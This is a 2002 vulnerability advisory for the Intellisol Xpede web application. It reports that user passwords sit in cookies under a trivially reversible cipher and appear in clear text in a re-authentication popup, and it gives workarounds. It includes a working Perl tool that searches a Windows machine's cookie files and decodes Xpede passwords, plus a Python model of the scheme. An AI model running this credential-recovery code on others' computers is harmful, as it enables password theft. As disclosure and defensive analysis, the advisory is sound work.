Intellisol Xpede v4.1 and 7.1 contain two remote vulnerabilities which disclose user passwords. Workaround information included.
Passwords exposed in Intellisol XPede
==========================
About Xpede
=========
quote from http://www.workforceroi.com/solutions/pa/index.shtml
"Intellisol Xpede is a browser-based time and expense entry and project cost
management module designed to connect a remote workforce on a real-time
basis.
Intellisol Project Accounting is designed for any professional service
organization such as consulting, software development, law, architecture,
engineering, PR/advertising and more with between 10 and 500 million dollars
in revenue and up to 500 employees,
and integrates with Microsoft Great Plains Business Solutions financial
suites. "
Problems
=======
Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilities have been discovered in the way Xpede handles
user passwords.
1/ Xpede's cookies store user passwords "ciphered" in a very weak manner
(a mix of shifts and permutations); recovering the clear-text password from
the cookie is trivial. This makes users remotely vulnerable to cross-site
scripting based attacks and to various MSIE bugs, and locally vulnerable as
well, through access to the local filesystem (i.e. the cookie file), for
instance when a user decides to use someone else's computer or shares
Administrator rights on a computer with others.
2/ Passwords are shown in clear in the source of the "session timeout"
re-authentication popup.
The guilty JavaScript snippet simulates a "remember password" option and
tests whether it was checked in order to fill in the form's password field
automatically.
The clear password appears as-is in the JavaScript source, whatever the user
decided to do with the option.
As a result a user can have a false sense of safety: leaving the host even
for a few seconds without having filled in the authentication popup exposes
the password to anybody who looks at the page source and, once again, the
user is remotely vulnerable to the same MSIE bugs mentioned above.
Temp workarounds
=============
1st problem / clear all cookies via MSIE "Tools/Internet
Options/General/Delete Cookies" right after a session has ended,
to avoid the local attack, and patch your browser with the latest security
fixes if it wasn't already done
(anyway, you may fall into more serious trouble in the latter case :).
2nd problem / do not expose the authentication popup to unwise eyes (log in
or quit the application) and, again, patch your browser against remote attacks.
Additionally, for the paranoid, I suggest closing all running MSIE windows
before accessing the Xpede application (and during the session).
Vendor status
=========
The vendor has been contacted on March 13 and, as far as I know, is
currently working on a patch;
in the meantime, you may want to use the above workarounds.
Versions
======
The Xpede support team has reported that both the Xpede 4.1 and 7.x series
were affected by these vulnerabilities.
Author & Date
===========
Gregory Duchemin (c3rb3r@hotmail.com)
20 March 2002.
Have a nice day.
Proof of concept (password recovery from cookies)
====================================
#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 2002
#
#output format
format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.
#Cookie fingerprint
$signature="defPWD";
#decoding stuff
@PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA=('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);
#Change the following path to match your system
@COOKIE= glob('c:\winnt\Profiles\*\Cookies\*@*.txt');
$i=$count=0;
@FOUND= ('nope');
print "\n\nXdeep.pl Xpede cookies finder and decoder \n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --\n\n\n";
foreach $try (@COOKIE) {
$count++;
if (open(handle, $try))
{
@lines=<handle>;
# index() returns 0 when the signature opens the first line of the cookie file
if (!index($lines[0], $signature))
{
printf("\n+ Xpede cookie found ! yep :) <=> %s\n", $try);
$FOUND[$i]=$try;
$i++;
}
close(handle);
}
}
printf("\n+ %d files checked.\n", $count);
if (! $i)
{
print "\n\n- No Xpede cookie found, sorry\n\n";
exit(0);
}
printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try=<STDIN>;
foreach $try (@FOUND) {
if (open(handle, $try))
{
@lines=<handle>;
# Fixed line positions of the fields inside the cookie file
$userid = $lines[55];
$realname = $lines[64];
$password = $lines[46];
$company = $lines[28];
$realname =~ s/\+/ /;
$userid =~ s/\+/ /;
$password =~ s/\+/ /;
$company =~ s/\+/ /;
$userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
$company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
write;
print "\n\n! Cr4cking 1n progr3ss ... \n";
@list=split //, $password;
if (length($password) > 12 )
{
$MAX = 11;
$DIFF = length($password)-1-$MAX;
for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list[$i]; }
splice(@list, 0, ($DIFF));
printf "\n+ Clear part is %s\n", $REST;
}
else {$MAX = length($password)-1;printf "\n- No clear part found \n";}
# Undo the permutation (PERMU holds 1-based positions)
for ($i=0; $i<$MAX; $i++) { $temp_pass = $temp_pass.$list[$PERMU[$i]-1]; }
printf "\n+ Permutations give %s\n", $temp_pass;
@list=split //, $temp_pass;
# Undo the shifts within the 52-letter alphabet; other characters are kept as-is
for ($i=0; $i<$MAX; $i++)
{
$b = ord($list[$i]);
$c = $SHIFT[$i];
$flag=0;
for ($z=0; $z<52; $z+=1)
{
if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA[($z+$c)%52]);$flag=1;}
}
if (!$flag) {$a = $b;}
$decode = $decode.chr($a);
printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr($a);
}
printf "\n\n+ Shifting with secret key give %s\n", $decode;
printf "\n! Password is \"%s\"\n\n", $decode.$REST;
printf "\n\n- End.\n\n";
$decode=$REST=$temp_pass="";
close(handle);
print "\n\n[Press return]\n";
$try=<STDIN>;
}
}
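For clarity, here is the same cookie transform modelled in Python with the tables from the script above, together with its inverse; this is an added example, not the advisory's or the vendor's code. It assumes the ciphered block is always exactly 11 characters, with any further characters of a longer password stored in clear in front of it, which is how the decoder above treats values longer than 12 bytes (11 characters plus the trailing newline).

```python
from urllib.parse import unquote_plus
import string

# Tables taken from the Perl script above; the only "key" is these constants.
ALPHA = string.ascii_uppercase + string.ascii_lowercase  # 52 letters
PERMU = [9, 11, 2, 6, 4, 10, 1, 8, 7, 3, 5]             # 1-based positions
SHIFT = [9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23]
BLOCK = 11  # assumption: the ciphered part is always exactly 11 characters


def _shift(ch, n):
    """Rotate one letter by n places within ALPHA; other characters pass through."""
    i = ALPHA.find(ch)
    return ch if i < 0 else ALPHA[(i + n) % len(ALPHA)]


def decode(stored):
    """Plaintext from the raw cookie value (same steps as the Perl decoder)."""
    if len(stored) < BLOCK:
        raise ValueError("stored value shorter than the 11-character block")
    clear, block = stored[:-BLOCK], stored[-BLOCK:]      # clear part sits in front
    permuted = "".join(block[p - 1] for p in PERMU)      # undo the permutation
    head = "".join(_shift(c, s) for c, s in zip(permuted, SHIFT))  # undo the shifts
    return head + clear


def encode(password):
    """Inverse of decode(): what the application has to do to build the cookie.
    It needs no secret either, which is exactly why the scheme is not encryption."""
    if len(password) < BLOCK:
        raise ValueError("password shorter than the 11-character block")
    head, tail = password[:BLOCK], password[BLOCK:]
    unshifted = [_shift(c, -s) for c, s in zip(head, SHIFT)]
    block = [""] * BLOCK
    for i, p in enumerate(PERMU):
        block[p - 1] = unshifted[i]                      # scatter by the permutation
    return tail + "".join(block)


def password_from_cookie_field(field):
    """URL-decode a cookie line the way the PoC does, then decipher it."""
    return decode(unquote_plus(field.strip()))


if __name__ == "__main__":
    sample = "CorrectHorse9!"  # constructed sample, not a real credential
    cookie = encode(sample)
    print(cookie, "->", decode(cookie))
```

Both directions use nothing but the constant tables, so anyone holding the cookie can run decode() just as the application does; the stored value is plaintext with extra steps.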